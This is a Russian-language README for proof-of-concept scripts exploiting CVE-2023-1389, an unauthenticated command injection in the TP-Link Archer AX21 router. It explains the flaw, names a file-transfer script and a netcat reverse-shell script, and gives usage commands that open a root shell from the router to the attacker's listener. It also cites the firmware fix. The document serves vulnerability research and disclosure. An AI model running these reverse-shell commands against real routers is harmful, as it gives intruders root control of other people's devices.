PoC-скрипты для CVE-2023-1389 — неаутентифицированная инъекция команд в TP-Link Archer AX21, обеспечивающая передачу файлов и возможности reverse shell.
CVE-2023–1389 — это уязвимость неаутентифицированного внедрения команд в Wi-Fi-роутере TP-Link Archer AX21. Обратный вызов в параметре country использует функцию popen(), которая выполняется от root, что позволяет атакующему внедрять произвольные значения через GET или POST запросы к интерфейсу администратора без необходимости аутентификации. Более подробную информацию об уязвимости можно найти здесь.
Вот несколько Proof-of-Concept (PoC), которые я создал во время исследования внедрения команд. Archer-file-transfer.py был первой итерацией и довольно запутан в том, как он достигает взаимодействия. Archer-rev-shell.py предоставляет простую обратную оболочку netcat и, вероятно, является тем, за чем вы пришли. Если вы хотите узнать больше о разработке этих скриптов, вы можете прочитать пост здесь.
В одном окне терминала:
nc your_IP listener_port
Во втором окне терминала:
python3 archer-rev-shell.py -r router_IP -a your_IP -p listner_port
TP-Link выпустил версию прошивки 1.1.4 Build 20230219, которая устраняет проблему, удаляя уязвимый обратный вызов. Обновление вашего роутера до последней прошивки должно защитить ваше устройство.
Я, вероятно, не буду поддерживать эти PoC. Оба они довольно просты и должны легко модифицироваться по мере необходимости.